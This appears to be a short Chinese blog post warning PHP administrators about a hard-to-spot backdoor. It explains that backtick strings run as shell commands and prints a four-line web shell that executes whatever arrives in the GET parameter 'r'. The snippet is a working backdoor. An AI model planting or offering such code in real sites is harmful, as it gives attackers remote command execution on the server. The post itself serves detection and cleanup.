一个不宜发现的PHP后门书写方式

抓到一段看起来似乎没有什么问题的代码,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。


$selfNums = $_GET['r'];
if (isset($selfNums)){
    echo `$selfNums`;
}
大家查杀后门的要注意。



关键词: php后门

上一篇: 使用DiscuzX 2.5/3.X系统的图片类给图片打水印
下一篇: web集群应用保持session同步的3种方法探讨

目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):